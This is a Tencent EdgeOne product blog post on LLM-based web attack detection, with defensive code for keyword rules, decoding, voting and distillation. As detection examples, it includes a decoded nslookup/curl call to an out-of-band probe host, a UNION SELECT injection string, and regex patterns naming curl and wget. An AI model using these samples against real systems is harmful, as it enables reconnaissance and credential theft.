When Vulnerability Attacks Meet Tencent Hunyuan: The Cyber Duel of Web Security with EdgeOne

EdgeOne-Product Team
10 min read
Apr 27, 2025

The "Tencent Cloud 2024 DDoS and Application Security Threat Trends Report" indicates that the methods of attack leveraging vulnerabilities and application weaknesses are becoming increasingly diverse and complex. In 2024, the total number of high-risk vulnerability attacks is expected to exceed 1.7 billion. Faced with this severe challenge, how should we respond? In this article, we will discuss our latest endeavor—leveraging large model capabilities for vulnerability identification. You can experience EdgeOne's vulnerability detection capabilities firsthand through the Managed Rules - Deep Analysis feature.

New Cybersecurity Threats: The Dual Challenge of Vulnerability Attacks

Currently, cybersecurity faces unprecedented challenges, particularly in the context of frequent vulnerability attacks. Imagine a scenario during a major e-commerce promotion where hackers stealthily steal user data using clever SQL statements or disguise malicious scripts as legitimate requests, launching attacks amidst a sea of legitimate traffic. This poses a constant risk of data breaches and business interruptions for enterprises.

To counter these threats, EdgeOne's Web Traffic Attack Detection System effectively filters and intercepts malicious vulnerability attack traffic, mitigating the risks of intrusion and data leakage. However, as attack methods continue to evolve, traditional defense systems face the dual dilemma of false negatives and false positives:

 Expert Rules can quickly identify known attacks but are powerless against novel threats.

 Semantic Analysis offers high accuracy but is slower when processing massive volumes of requests.

 Traditional Machine Learning has adaptive capabilities but is limited in practical applications due to its reliance on data.

Detection Solution: Expert Rules

Description: Matches attack patterns against rules predefined by security experts (e.g., regex, feature strings).

Advantages: Low development cost, fast rule matching, quick output for known attacks.

Disadvantages: High maintenance cost: requires continuous manual updates, lagging behind new attacks; prone to false negatives and positives.

Detection Solution: Semantic Analysis

Description: Analyzes the semantic structure of inputs (e.g., SQL syntax trees, JavaScript execution intentions) to determine if they conform to legitimate behavior.

Advantages: High detection accuracy, strong interpretability, can address some zero-day attacks.

Disadvantages: Complex implementation: requires deep understanding of target language syntax and execution environment, high development costs; significant performance overhead; limited scenarios: mainly targets attacks with strong language characteristics (e.g., SQL injection, XSS), poor generalizability.

Detection Solution: Traditional Machine Learning

Description: Trains models (e.g., random forests, HMM, clustering algorithms) to analyze traffic features, behavior patterns, or text structures to distinguish normal traffic from attack traffic.

Advantages: Strong adaptability (reduces reliance on manual rules), can address some zero-day attacks.

Disadvantages: Data dependency: requires a large amount of labeled data, data quality directly impacts effectiveness; poor interpretability: model decision processes are opaque, making debugging false positives difficult.

In this context, improving detection accuracy has become our focal point. The emergence of large models offers a new solution to this problem.

Application of Large Models in Traffic Analysis: From Basic Knowledge to Deep Analysis

Large models learn foundational security knowledge, code logic in HTTP traffic, protocol behaviors, and attack patterns through pre-training, constructing multi-layered knowledge associations to genuinely understand traffic behavior and enhance detection accuracy. For instance, when parsing SQL injections, the model not only identifies keywords like SELECT FROM or UNION SELECT but also assesses whether they constitute closed queries and whether they disrupt business logic.

The following two examples illustrate the large model's capability for deep analysis and understanding of traffic content, achieving a leap from "syntactic compliance" to "intent harm assessment."

Scenario 1: The Debate of the True and False Monkey King—Identifying Normal SQL Queries to Avoid False Positives from Traditional Static Rules.

Traditional Detection: Triggers an alert upon seeing SQL keywords.

LLM Detective Perspective:

Checks request context: understands the semantics as a legitimate business query interface.

Behavior pattern analysis: no special characters indicating injection.

Conclusion: This is a normal product query from the business backend!
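The gap between the two perspectives can be sketched in a few lines of Python. The keyword pattern, the injection markers, and both sample values are illustrative assumptions, not EdgeOne rules, and the second check is only a crude stand-in for the far richer context a large model weighs.

```python
import re

# Hypothetical keyword rule of the "alert on SQL keywords" kind.
SQL_KEYWORDS = re.compile(r"\bunion\s+select\b|\bselect\b.+\bfrom\b", re.IGNORECASE)

# Characters and sequences that commonly break out of a query context
# (an illustrative, far from complete list).
INJECTION_MARKERS = re.compile(r"['\";]|--|/\*")


def keyword_rule(value: str) -> bool:
    """Static rule: alert as soon as SQL keywords appear."""
    return bool(SQL_KEYWORDS.search(value))


def keyword_rule_with_context(value: str) -> bool:
    """Alert only if SQL keywords appear together with injection markers."""
    return keyword_rule(value) and bool(INJECTION_MARKERS.search(value))


# Assumed samples: a backend product query and a classic injection attempt.
benign = "SELECT name, price FROM products WHERE category = 3"
attack = "1' UNION SELECT username, password FROM users--"

for sample in (benign, attack):
    print(keyword_rule(sample), keyword_rule_with_context(sample), sample)
```

The keyword-only rule alerts on both samples, while the context-aware check alerts only on the injection attempt, which is the false positive the scenario describes.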


Scenario 2: The Secret of the Password Book—Automatically Decrypting Encrypted Content and Conducting Intent Analysis to Accurately Identify Attacks.

Encrypted Traffic:

keyword=fChuc2xvb2t1cCR7SUZTfS1xJHtJRIN9Y25hbWUke0IGU31oaXRnaXFtZnZnc3drZDc4NjQu...

LLM Detective Investigation Process:

Detects the obfuscated content (the value appears to be Base64-encoded) and decodes it to reveal a combination of commands:

nslookup cname ***********.bxss.me

curl ***********.bxss.me

Key Insight: The domain resolves to a malicious IP, and the curl command sends a request to it.

Conclusion: This is a malicious attack!
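The decode-then-inspect step can be approximated as follows. This is a minimal sketch that assumes the hidden payload is Base64-encoded UTF-8 text; the command list, the helper names, and the sample payload (built in the code rather than taken from the truncated traffic above) are all hypothetical.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import parse_qs, quote

# Hypothetical list of commands worth flagging once a value has been decoded.
SUSPICIOUS_COMMANDS = re.compile(r"\b(nslookup|curl|wget)\b")


def decode_if_base64(value: str) -> Optional[str]:
    """Return the decoded text if value is valid Base64 holding UTF-8, else None."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def find_hidden_commands(query_string: str) -> List[str]:
    """Decode each query parameter and report those that hide shell commands."""
    findings = []
    for name, values in parse_qs(query_string).items():
        for value in values:
            decoded = decode_if_base64(value)
            if decoded and SUSPICIOUS_COMMANDS.search(decoded):
                findings.append(f"{name}: {decoded}")
    return findings


# Assumed payload for illustration only.
hidden = "nslookup probe.example.invalid; curl http://probe.example.invalid/"
query = "keyword=" + quote(base64.b64encode(hidden.encode()).decode())

print(find_hidden_commands(query))
print(find_hidden_commands("keyword=red+shoes"))
```

A fixed command list like this is exactly what an attacker can evade with a new encoding or command, which is why the article relies on the model's understanding of intent rather than on a lookup.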


Large Model Optimization and Multi-Model Collaboration: Enhancing the Efficiency and Accuracy of Network Attack Detection

How can we apply large models in EdgeOne? Next, we will discuss the challenges and solutions we encountered during practical implementation.

Chain of Thought (CoT) Training Method: Enhancing Attack Recognition Capabilities through Prompt Tuning

Given that HTTP traffic attack content may appear in various fields and undergo encoding and encryption to conceal attacks, simple prompt instructions may lead to insufficient analysis by the model, resulting in missed detections.

During prompt tuning, we draw on the Chain of Thought (CoT) approach: based on the characteristics of real-world attack traffic, the prompt lays out an analysis process for deciding whether a request is a web attack. This guides the large model to reason step by step before confirming a result, much like Sherlock Holmes deducing the truth from the details of a case!

Scenario Case: Identifying an attack in which the attacker probes whether the origin server exposes a compressed archive of its source code.
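A step-by-step prompt of this kind might look like the sketch below. The wording of the steps, the verdict format, and the sample request for a hypothetical /www.zip archive are assumptions made for illustration; the article does not publish its actual prompt.

```python
# Hypothetical analysis steps that the prompt asks the model to follow in order.
COT_STEPS = [
    "List every field that can carry attacker input: path, query string, headers, cookies, body.",
    "Decode any URL-encoded, Base64, or otherwise obfuscated values before judging them.",
    "Describe what the request would do on the server if processed as written.",
    "Decide whether that behavior matches a known web attack pattern or normal business use.",
    "Answer with a final line of the form 'VERDICT: attack' or 'VERDICT: normal'.",
]


def build_cot_prompt(raw_request: str) -> str:
    """Assemble a chain-of-thought prompt around one raw HTTP request."""
    steps = "\n".join(f"{i}. {step}" for i, step in enumerate(COT_STEPS, start=1))
    return (
        "You are a web security analyst. Analyze the HTTP request step by step.\n"
        f"{steps}\n\n"
        "HTTP request:\n"
        f"{raw_request}\n"
    )


def parse_verdict(model_output: str) -> str:
    """Read the last 'VERDICT:' line of the model's answer, or return 'unknown'."""
    for line in reversed(model_output.strip().splitlines()):
        if line.strip().upper().startswith("VERDICT:"):
            return line.split(":", 1)[1].strip().lower()
    return "unknown"


# Assumed probe for a source-code archive left on the origin server.
request = "GET /www.zip HTTP/1.1\nHost: shop.example.invalid"
print(build_cot_prompt(request))
```

Asking for a fixed final line keeps the model's free-form reasoning while still giving downstream code a single field to parse.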

Large Model Slimming Plan: Fine-Tuning Small Parameter Models to Enhance Detection Efficiency

As EdgeOne's customer traffic scales dramatically, large parameter models face challenges due to high computational complexity and inference latency, making it difficult to meet efficient detection needs. Through domain knowledge distillation, we can transfer the capabilities of large models to small parameter models.

Small parameter models require lower resource costs and offer faster processing performance. However, comparative evaluations show that small parameter models are less effective in detecting attack samples and accurately identifying benign samples than large parameter models. By distilling the attack determination data from large parameter models and fine-tuning small parameter models, we achieve performance close to that of large parameter models in sample set evaluations.

 Data: 7,000 entries (including various attack type samples and benign samples).

 Base Models: hunyuan-3b, qwen2.5-3b, llama3.2-3b

 Fine-Tuning Method: LoRA
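One way to picture the distillation data is as a set of records that pair each request with the large model's reasoning and verdict. The sketch below assumes an instruction/input/output JSONL layout, a common convention for supervised fine-tuning that the article does not confirm, and both sample records are hypothetical.

```python
import json
from typing import Dict, Iterable

# Assumed instruction text shared by every training record.
INSTRUCTION = "Decide whether the HTTP request is a web attack. Answer 'attack' or 'normal'."


def to_training_record(raw_request: str, teacher_reasoning: str, teacher_verdict: str) -> Dict[str, str]:
    """Turn one judgment from the large (teacher) model into a fine-tuning record."""
    if teacher_verdict not in ("attack", "normal"):
        raise ValueError(f"unexpected verdict: {teacher_verdict!r}")
    return {
        "instruction": INSTRUCTION,
        "input": raw_request,
        "output": f"{teacher_reasoning}\nVERDICT: {teacher_verdict}",
    }


def to_jsonl(records: Iterable[Dict[str, str]]) -> str:
    """Serialize records as JSON Lines, one record per line."""
    return "\n".join(json.dumps(record, ensure_ascii=False) for record in records)


# Hypothetical teacher outputs: (request, reasoning, verdict).
samples = [
    ("GET /www.zip HTTP/1.1", "The path probes for a source-code archive.", "attack"),
    ("GET /products?category=3 HTTP/1.1", "An ordinary catalog query.", "normal"),
]
jsonl = to_jsonl(to_training_record(*sample) for sample in samples)
print(jsonl)
```

Keeping the teacher's reasoning in the output field, rather than the verdict alone, is a design choice that lets the small model learn the analysis steps as well as the label.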

LLM Detective Alliance: Multi-Model Joint Voting

We fine-tuned several small base models in parallel: hunyuan-3b, qwen2.5-3b, and llama3.2-3b. On the test sample set, each model has its own strengths and weaknesses in attack detection rate and benign sample recognition rate. Comparing per-sample results, the Tencent Hunyuan model performed best in three of the five attack type scenarios, and in the remaining two the other models complemented it. We therefore designed a joint voting scheme across the three small models to improve overall detection accuracy.

Detection Logic: If at least two of the three models classify a request as an attack, it is deemed an attack; if at least two classify it as normal, it is deemed normal.
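Assuming the rule is a simple majority among three voters, the joint decision can be sketched as below. The function name and the label strings are hypothetical.

```python
from typing import Sequence


def joint_verdict(verdicts: Sequence[str]) -> str:
    """Majority vote over exactly three per-model verdicts ('attack' or 'normal')."""
    if len(verdicts) != 3:
        raise ValueError("expected one verdict from each of the three models")
    if any(v not in ("attack", "normal") for v in verdicts):
        raise ValueError("verdicts must be 'attack' or 'normal'")
    attack_votes = sum(v == "attack" for v in verdicts)
    return "attack" if attack_votes >= 2 else "normal"


# Verdicts in a fixed order, e.g. hunyuan-3b, qwen2.5-3b, llama3.2-3b.
print(joint_verdict(["attack", "normal", "attack"]))
print(joint_verdict(["normal", "normal", "attack"]))
```

With an odd number of binary voters there is never a tie, so no tie-breaking policy is needed.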

Evaluation Results on Sample Sets: Through multi-model collaboration, the overall attack detection accuracy improved compared to single models, achieving performance close to that of large parameter models.

Third-Party Tool Evaluation (BlazeHTTP): BlazeHTTP (https://github.com/chaitin/blazehttp) is a well-known public third-party evaluation tool for web traffic attack detection, with a total of over 33,000 samples covering various attacks and benign samples. EdgeOne's strict mode for vulnerability protection achieved an accuracy rate exceeding 99%, with a false positive rate of only 0.4%.
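For readers who want to reproduce such figures on their own sample set, the two metrics can be computed from a confusion matrix as sketched below. The article does not state its exact formulas, so the standard definitions are assumed here, and the counts are made up purely to exercise the code; they are not BlazeHTTP results.

```python
def accuracy(tp: int, tn: int, fp: int, fn: int) -> float:
    """Share of all samples, attack and benign, that were classified correctly."""
    return (tp + tn) / (tp + tn + fp + fn)


def false_positive_rate(fp: int, tn: int) -> float:
    """Share of benign samples that were wrongly flagged as attacks."""
    return fp / (fp + tn)


# Made-up counts: tp = attacks caught, fn = attacks missed,
# tn = benign requests passed, fp = benign requests blocked.
tp, fn, tn, fp = 90, 10, 995, 5

print(f"accuracy: {accuracy(tp, tn, fp, fn):.4f}")
print(f"false positive rate: {false_positive_rate(fp, tn):.4f}")
```

Because benign samples usually far outnumber attacks, accuracy alone can look high even when many attacks are missed, which is why the false positive rate is reported alongside it.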

Future Outlook for Cybersecurity: From Defense to Intelligent Governance

Digital Sandbox

Constructing a digital mirror outside the real environment, where AI can:

Safely test new rules.

Simulate attack drills.

Validate model reliability.

In the observation mode of EdgeOne's vulnerability protection, requests that hit rules for a domain are judged offline by the large model. Strategies that do not suit the business are then filtered out automatically, so protection adapts to each site, like having an ever-vigilant special security force!
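The filtering step could work roughly as in the following sketch: group rule hits by rule, look at how often the offline model judged the matched request to be normal, and flag rules that mostly hit benign traffic. The thresholds, rule IDs, and function name are hypothetical; the article does not describe the actual criteria.

```python
from collections import defaultdict
from typing import Iterable, List, Tuple


def unsuitable_rules(
    hits: Iterable[Tuple[str, str]],
    max_benign_ratio: float = 0.5,
    min_hits: int = 5,
) -> List[str]:
    """Return rule IDs whose hits were mostly judged 'normal' by the offline model.

    hits: (rule_id, verdict) pairs, where verdict is 'attack' or 'normal'.
    """
    by_rule = defaultdict(list)
    for rule_id, verdict in hits:
        by_rule[rule_id].append(verdict)

    flagged = []
    for rule_id, verdicts in sorted(by_rule.items()):
        if len(verdicts) < min_hits:
            continue  # too little evidence to judge this rule
        benign_ratio = verdicts.count("normal") / len(verdicts)
        if benign_ratio > max_benign_ratio:
            flagged.append(rule_id)
    return flagged


# Hypothetical observation-mode log for one domain.
log = (
    [("rule-a", "normal")] * 8 + [("rule-a", "attack")] * 2
    + [("rule-b", "attack")] * 10
    + [("rule-c", "normal")] * 2
)
print(unsuitable_rules(log))
```

The minimum-hit guard keeps a rule from being dropped on the strength of one or two verdicts.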

0Day Hunting Program

Combining RAG technology, we can correlate threat intelligence with vulnerability databases in real-time to identify zero-day attacks through traffic feature recognition.

Traffic Features → Semantic Parsing → Threat Knowledge Graph → Global Attack Sample Library → Automatically Generate Protection Strategies.
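The retrieval part of such a pipeline can be illustrated with a toy example. The sketch below swaps in plain token-overlap (Jaccard) scoring for a real embedding index, and the intelligence notes, their IDs, and the sample header are invented for illustration; it shows only how retrieved context would be attached to a request before the model judges it.

```python
import re
from typing import Dict, List, Set


def tokens(text: str) -> Set[str]:
    """Lowercase alphanumeric tokens of a text."""
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def retrieve(query: str, notes: Dict[str, str], k: int = 2) -> List[str]:
    """Return up to k note IDs ranked by Jaccard overlap with the query."""
    query_tokens = tokens(query)
    scored = []
    for note_id, text in notes.items():
        note_tokens = tokens(text)
        union = query_tokens | note_tokens
        score = len(query_tokens & note_tokens) / len(union) if union else 0.0
        scored.append((score, note_id))
    scored.sort(key=lambda pair: (-pair[0], pair[1]))
    return [note_id for score, note_id in scored[:k] if score > 0]


def build_prompt(request: str, notes: Dict[str, str]) -> str:
    """Prepend the retrieved notes to the request as context for the model."""
    context = "\n".join(f"[{note_id}] {notes[note_id]}" for note_id in retrieve(request, notes))
    return f"Threat intelligence:\n{context}\n\nHTTP request:\n{request}\n"


# Invented threat-intelligence notes standing in for a real knowledge base.
NOTES = {
    "INTEL-001": "jndi ldap lookup string in header triggers remote class loading",
    "INTEL-002": "path traversal using dot dot slash sequences to read etc passwd",
    "INTEL-003": "sql injection with union select against login form",
}
request = "User-Agent: ${jndi:ldap://host.example.invalid/a}"
print(build_prompt(request, NOTES))
```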

When large models meet cybersecurity, we not only create smarter detection tools but also redefine the boundaries of defense. This ongoing arms race is witnessing how AI transforms from a bystander to a guardian. Behind your secure web browsing, there may be an invisible AI detective safeguarding your safety!

Currently, the standard version of EdgeOne offers a coupon for a discount of 318 on purchases over 590 (click the link for more event information: Best Affordable Secure CDN: Tencent EdgeOne - Free Trial). You can experience EdgeOne's vulnerability detection capabilities firsthand through the Managed Rules - Deep Analysis feature. The large model-based vulnerability identification capability is under intensive planning and development, promising revolutionary changes in the field of vulnerability detection. Stay tuned for more updates! For more information, please refer to the product documentation: Managed rules

Tencent Cloud 2024 DDoS and Application Security Threat Trends Report: 2024 DDoS and Application Security Threat Trend Report - Tencent EdgeOne